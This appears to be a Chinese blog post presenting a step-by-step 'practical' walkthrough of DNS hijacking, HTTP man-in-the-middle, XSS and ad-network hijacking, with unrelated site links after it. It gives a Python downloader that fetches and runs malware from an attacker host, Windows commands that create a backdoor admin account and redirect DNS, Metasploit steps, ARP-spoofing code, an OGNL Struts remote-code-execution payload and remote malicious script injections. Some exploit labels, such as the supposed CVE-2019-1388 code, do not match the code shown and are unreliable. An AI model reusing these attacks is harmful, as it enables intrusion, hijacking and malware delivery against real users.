关于DNS劫持、HTTP劫持、内容注入和广告劫持的详细分析-实战篇
yuyutoo 2024-10-21 11:59 3 浏览 0 评论
仅供学习研究交流使用,切勿用于违法犯罪,为维护网络安全做贡献!
一、DNS劫持
1. 修改本地DNS设置
步骤一:物理访问或恶意软件感染
恶意软件感染:
- 攻击者通过钓鱼邮件或恶意网站诱导用户下载并运行恶意软件。
python
复制代码
# 示例Python代码,恶意软件伪装成合法软件 import os def download_payload(): # 下载恶意软件 os.system("curl -O http://malicious-website.com/malware.exe") def execute_payload(): # 执行下载的恶意软件 os.system("malware.exe") download_payload() execute_payload()
步骤二:获取管理员权限
提权方法:
- 恶意软件利用系统漏洞提升权限,例如通过Windows UAC绕过或使用已知的提权漏洞。
示例漏洞:CVE-2019-1388
- CVE-2019-1388是一个Windows UAC绕过漏洞,攻击者可以通过伪造的签名窗口提升权限。
利用示例:
- 创建恶意文件:
c
复制代码
// Exploit.c: 利用CVE-2019-1388的UAC绕过漏洞 #include <windows.h> #include <stdio.h> int main() { SHELLEXECUTEINFO shExecInfo; shExecInfo.cbSize = sizeof(SHELLEXECUTEINFO); shExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS; shExecInfo.hwnd = NULL; shExecInfo.lpVerb = "runas"; // 请求管理员权限 shExecInfo.lpFile = "cmd.exe"; // 要运行的程序 shExecInfo.lpParameters = "/c net user hacker Password123! /add"; // 创建新用户 shExecInfo.lpDirectory = NULL; shExecInfo.nShow = SW_SHOWNORMAL; shExecInfo.hInstApp = NULL; ShellExecuteEx(&shExecInfo); WaitForSingleObject(shExecInfo.hProcess, INFINITE); CloseHandle(shExecInfo.hProcess); return 0; }
- 编译并运行恶意文件:
shell
复制代码
gcc Exploit.c -o Exploit.exe Exploit.exe
步骤三:修改DNS设置
使用命令提示符:
shell
复制代码
# 修改DNS设置,将DNS服务器地址更改为攻击者控制的DNS服务器 netsh interface ip set dns name="Local Area Connection" static 203.0.113.5
修改注册表:
shell
复制代码
# 示例命令,修改注册表中的DNS设置 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{interface-ID}" /v NameServer /t REG_SZ /d 203.0.113.5 /f
步骤四:DNS解析劫持
- 当用户访问合法域名时,DNS请求被发送到攻击者控制的DNS服务器,返回伪造的IP地址,重定向用户到恶意网站。
2. 攻击DNS服务器
步骤一:识别目标DNS服务器
- 使用工具如nslookup、whois或dig来识别DNS服务器的IP地址和相关信息。
shell
复制代码
# 使用nslookup识别DNS服务器 nslookup example.com
步骤二:漏洞利用或暴力破解
- 利用DNS服务器软件的已知漏洞,例如BIND DNS服务器中的漏洞CVE-2020-8617,或通过暴力破解获取管理员权限。
shell
复制代码
# 使用Metasploit框架利用BIND DNS漏洞 use exploit/linux/misc/bind_tkey set RHOSTS <target_ip> set LHOST <your_ip> exploit
步骤三:篡改DNS解析记录
- 登录DNS服务器的管理界面,修改DNS解析记录,将合法域名解析为恶意IP地址。
shell
复制代码
# 例如,在BIND DNS服务器中修改zone文件 vi /etc/bind/named.conf.local # 添加或修改解析记录 zone "example.com" { type master; file "/etc/bind/db.example.com"; };
步骤四:劫持用户请求
- 所有请求该DNS服务器解析域名的用户都会被重定向到恶意网站。
二、HTTP劫持
中间人攻击(MITM)
步骤一:建立中间人位置
ARP欺骗:
python
复制代码
# 使用scapy库进行ARP欺骗 from scapy.all import ARP, send def arp_poison(target_ip, target_mac, spoof_ip): arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, op='is-at') send(arp_response, verbose=0) # 示例:将目标IP的网关MAC地址更改为攻击者的MAC地址 arp_poison('192.168.1.10', '00:11:22:33:44:55', '192.168.1.1')
步骤二:拦截HTTP请求
捕获HTTP流量:
shell
复制代码
# 使用Wireshark或tcpdump捕获HTTP流量 tcpdump -i eth0 -w capture.pcap 'tcp port 80'
步骤三:篡改HTTP响应
使用Burp Suite拦截并修改HTTP响应:
- 在Burp Suite中设置拦截规则,拦截HTTP响应并插入恶意代码。
html
复制代码
<!-- 插入恶意JavaScript代码的示例 --> <script>alert('This site is hacked');</script>
步骤四:执行恶意代码
- 用户浏览器接收并执行篡改后的HTTP响应,执行其中的恶意代码。
三、内容注入
XSS(跨站脚本)攻击
步骤一:发现注入点
- 攻击者在论坛、评论区或其他用户输入区域进行测试,寻找可以插入JavaScript代码的注入点。
步骤二:构造恶意代码
html
复制代码
<!-- 示例:构造包含恶意JavaScript代码的输入 --> <script>alert('XSS');</script>
步骤三:注入恶意代码
- 攻击者将恶意代码输入到注入点,提交表单或发布评论。
步骤四:执行恶意代码
- 服务器未对输入进行适当过滤,直接返回包含恶意代码的响应。用户浏览器执行恶意代码,攻击者实现控制。
四、广告劫持
劫持第三方广告网络
步骤一:识别目标广告网络
- 攻击者通过分析广告脚本和网络流量,确定广告网络的来源和结构。
javascript
复制代码
// 分析广告脚本 console.log(document.querySelectorAll('script[src*="adnetwork.com"]'));
步骤二:漏洞利用或社会工程学
- 利用广告网络的漏洞或通过社会工程学手段获取广告网络管理权限。
示例漏洞:CVE-2018-11776
- 这是一个Apache Struts的远程代码执行漏洞,攻击者可以通过特定的输入导致远程代码执行。
利用示例:
- 创建恶意请求:
http
复制代码
POST /struts2-rest-showcase/orders HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 100 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
- 发送恶意请求:
- 使用工具如curl或Burp Suite发送恶意请求,触发漏洞。
步骤三:替换广告内容
- 攻击者登录广告网络管理界面,将合法广告替换为恶意广告,内容包括恶意JavaScript代码或重定向链接。
html
复制代码
<!-- 替换广告内容为恶意广告 --> <script src="http://malicious-website.com/malicious.js"></script>
步骤四:加载恶意广告
- 用户浏览包含被劫持广告的网页时,恶意广告加载并执行,其中的恶意代码或重定向链接开始运行。
html
复制代码
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Ad Page</title> </head> <body> <h1>Welcome to the Ad Page</h1> <!-- 恶意广告加载 --> <script src="http://malicious-website.com/malicious.js"></script> </body> </html>
结论
通过详细的步骤和代码示例,我们可以更清楚地了解DNS劫持、HTTP劫持、内容注入和广告劫持的实现方式。这些攻击手段对用户和网络安全构成严重威胁,但通过了解其原理和实现细节,我们可以采取更有效的防护措施,保护我们的网络环境和数据安全。如果你有任何问题或想法,请在评论区分享,我们一起探讨。
相关推荐
- Mysql和Oracle实现序列自增(oracle创建序列的sql)
-
Mysql和Oracle实现序列自增/*ORACLE设置自增序列oracle本身不支持如mysql的AUTO_INCREMENT自增方式,我们可以用序列加触发器的形式实现,假如有一个表T_WORKM...
- 关于Oracle数据库12c 新特性总结(oracle数据库19c与12c)
-
概述今天主要简单介绍一下Oracle12c的一些新特性,仅供参考。参考:http://docs.oracle.com/database/121/NEWFT/chapter12102.htm#NEWFT...
- MySQL CREATE TABLE 简单设计模板交流
-
推荐用MySQL8.0(2018/4/19发布,开发者说同比5.7快2倍)或同类型以上版本....
- mysql学习9:创建数据库(mysql5.5创建数据库)
-
前言:我也是在学习过程中,不对的地方请谅解showdatabases;#查看数据库表createdatabasename...
- MySQL面试题-CREATE TABLE AS 与CREATE TABLE LIKE的区别
-
执行"CREATETABLE新表ASSELECT*FROM原表;"后,新表与原表的字段一致,但主键、索引不会复制到新表,会把原表的表记录复制到新表。...
- Nike Dunk High Volt 和 Bright Spruce 预计将于 12 月推出
-
在街上看到的PandaDunk的超载可能让一些球鞋迷们望而却步,但Dunk的浪潮仍然强劲,看不到尽头。我们看到的很多版本都是为女性和儿童制作的,这种新配色为后者引入了一种令人耳目一新的新选择,而...
- 美国多功能舰载雷达及美国海军舰载多功能雷达系统技术介绍
-
多功能雷达AN/SPY-1的特性和技术能力,该雷达已经在美国海军服役了30多年,其修改-AN/SPY-1A、AN/SPY-1B(V)、AN/SPY-1D、AN/SPY-1D(V),以及雷神...
- 汽车音响怎么玩,安装技术知识(汽车音响怎么玩,安装技术知识视频)
-
全面分析汽车音响使用或安装技术常识一:主机是大多数人最熟习的音响器材,有关主机的各种性能及规格,也是耳熟能详的事,以下是一些在使用或安装时,比较需要注意的事项:LOUDNESS:几年前的主机,此按...
- 【推荐】ProAc Response系列扬声器逐个看
-
有考牌(公认好声音)扬声器之称ProAcTablette小音箱,相信不少音响发烧友都曾经,或者现在依然持有,正当大家逐渐掌握Tablette的摆位设定与器材配搭之后,下一步就会考虑升级至表现更全...
- #本站首晒# 漂洋过海来看你 — BLACK&DECKER 百得 BDH2000L无绳吸尘器 开箱
-
作者:初吻给了烟sco混迹张大妈时日不短了,手没少剁。家里有了汪星人,吸尘器使用频率相当高,偶尔零星打扫用卧式的实在麻烦(汪星人:你这分明是找借口,我掉毛是满屋子都有,铲屎君都是用卧式满屋子吸的,你...
- 专题|一个品牌一件产品(英国篇)之Quested(罗杰之声)
-
Quested(罗杰之声)代表产品:Q212FS品牌介绍Quested(罗杰之声)是录音监听领域的传奇品牌,由英国录音师RogerQuested于1985年创立。在成立Quested之前,Roger...
- 常用半导体中英对照表(建议收藏)(半导体英文术语)
-
作为一个源自国外的技术,半导体产业涉及许多英文术语。加之从业者很多都有海外经历或习惯于用英文表达相关技术和工艺节点,这就导致许多英文术语翻译成中文后,仍有不少人照应不上或不知如何翻译。为此,我们整理了...
- Fyne Audio F502SP 2.5音路低音反射式落地音箱评测
-
FyneAudio的F500系列,有新成员了!不过,新成员不是新的款式,却是根据原有款式提出特别版。特别版产品在原有型号后标注了SP字样,意思是SpecialProduction。Fyne一共推出...
- 有哪些免费的内存数据库(In-Memory Database)
-
以下是一些常见的免费的内存数据库:1.Redis:Redis是一个开源的内存数据库,它支持多种数据结构,如字符串、哈希表、列表、集合和有序集合。Redis提供了快速的读写操作,并且支持持久化数据到磁...
- RazorSQL Mac版(SQL数据库查询工具)
-
RazorSQLMac特别版是一款看似简单实则功能非常出色的SQL数据库查询、编辑、浏览和管理工具。RazorSQLformac特别版可以帮你管理多个数据库,支持主流的30多种数据库,包括Ca...
你 发表评论:
欢迎- 一周热门
-
-
前端面试:iframe 的优缺点? iframe有那些缺点
-
带斜线的表头制作好了,如何填充内容?这几种方法你更喜欢哪个?
-
漫学笔记之PHP.ini常用的配置信息
-
其实模版网站在开发工作中很重要,推荐几个参考站给大家
-
推荐7个模板代码和其他游戏源码下载的网址
-
[干货] JAVA - JVM - 2 内存两分 [干货]+java+-+jvm+-+2+内存两分吗
-
正在学习使用python搭建自动化测试框架?这个系统包你可能会用到
-
织梦(Dedecms)建站教程 织梦建站详细步骤
-
【开源分享】2024PHP在线客服系统源码(搭建教程+终身使用)
-
2024PHP在线客服系统源码+完全开源 带详细搭建教程
-
- 最近发表
-
- Mysql和Oracle实现序列自增(oracle创建序列的sql)
- 关于Oracle数据库12c 新特性总结(oracle数据库19c与12c)
- MySQL CREATE TABLE 简单设计模板交流
- mysql学习9:创建数据库(mysql5.5创建数据库)
- MySQL面试题-CREATE TABLE AS 与CREATE TABLE LIKE的区别
- Nike Dunk High Volt 和 Bright Spruce 预计将于 12 月推出
- 美国多功能舰载雷达及美国海军舰载多功能雷达系统技术介绍
- 汽车音响怎么玩,安装技术知识(汽车音响怎么玩,安装技术知识视频)
- 【推荐】ProAc Response系列扬声器逐个看
- #本站首晒# 漂洋过海来看你 — BLACK&DECKER 百得 BDH2000L无绳吸尘器 开箱
- 标签列表
-
- mybatis plus (70)
- scheduledtask (71)
- css滚动条 (60)
- java学生成绩管理系统 (59)
- 结构体数组 (69)
- databasemetadata (64)
- javastatic (68)
- jsp实用教程 (53)
- fontawesome (57)
- widget开发 (57)
- vb net教程 (62)
- hibernate 教程 (63)
- case语句 (57)
- svn连接 (74)
- directoryindex (69)
- session timeout (58)
- textbox换行 (67)
- extension_dir (64)
- linearlayout (58)
- vba高级教程 (75)
- iframe用法 (58)
- sqlparameter (59)
- trim函数 (59)
- flex布局 (63)
- contextloaderlistener (56)